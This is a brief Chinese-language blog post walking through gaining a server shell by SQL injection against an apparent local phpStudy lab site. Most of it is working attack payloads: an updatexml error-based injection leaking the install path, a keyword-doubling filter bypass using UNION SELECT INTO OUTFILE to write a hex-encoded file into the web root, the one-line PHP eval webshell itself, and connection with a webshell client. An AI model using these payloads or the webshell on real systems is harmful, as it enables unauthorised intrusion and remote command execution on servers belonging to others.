标签：shell SQLGetShell 0x7e submit phpStudy null

SQLGetShell

利用sql注入来上传我们的木马后门，连接得到服务器shell

确定注入点

得到网站目录

user='and updatexml(1,concat(0x7e,@@basedir,0x7e),0) --+&password=asdf&code=5c23&submit=true&submit.x=32&submit.y=22

存在目录结构：_{D:/phpStudy/MySQL/}

传木马：

1' un union ion seselectlect null,null,null,null,0x3c3f70687020406576616c28245f504f53545b636d645d293b3f3e   in into outoutfilefile 'D:/phpStudy/WWW/bees/shell.php' -- a

<?php @eval($_POST[cmd]);?>

上传成功

用菜刀连接

成功

标签：shell,SQLGetShell,0x7e,submit,phpStudy,null
From： https://www.cnblogs.com/crabin/p/17092302.html